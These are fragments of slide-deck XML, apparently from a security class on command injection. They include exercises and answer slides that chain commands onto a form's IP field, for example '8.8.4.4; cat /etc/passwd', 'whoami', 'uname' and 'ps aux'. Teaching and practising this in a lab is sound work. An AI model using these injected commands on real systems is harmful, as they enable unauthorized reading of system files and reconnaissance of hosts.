                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to see the form's normal behavior.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use the semicolon to inject commands that:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dump the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print the current username</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print the operating system and kernel version</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print all running processes</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p7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9" name="Shape 1029"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Google Shape;1030;p5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Today’s Objectives</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p5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the end of class, you will be able to:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Google Shape;1032;p5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33" name="Google Shape;1033;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Test for command injection vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bypass basic command injection filters. </a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1034" name="Google Shape;1034;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1326248"/>
            <a:ext cx="230700" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd fmla="val 12500" name="adj"/>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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513375" y="1838523"/>
            <a:ext cx="230700" cy="226800"/>
          </a:xfrm>
          <a:prstGeom prst="bevel">
            <a:avLst>
              <a:gd fmla="val 12500" name="adj"/>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4" name="Shape 1164"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="Google Shape;1165;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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="1827000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Submit a valid IP address, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to see the form's normal behavior.</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use the semicolon to inject commands that:</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dump the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print the current username</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print the operating system and kernel version</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Print all running processes</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167" name="Google Shape;1167;p7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68" name="Google Shape;1168;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="197775" y="2766250"/>
            <a:ext cx="9144000" cy="2129100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Dump the contents of `/etc/passwd`</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>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600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4; cat /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>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600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Print the current username</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>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600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4; whoami</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>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600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Print the operating system and kernel version</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>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600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4; uname</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>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600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Print all running processes</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>8.8.4.4; ps aux</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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2" name="Shape 1172"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;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Command Injection Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="675975"/>
            <a:ext cx="9144000" cy="964500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Change your injection to use a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>bad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> IP address, such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>fake_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>. How does the output change?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="6A737D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
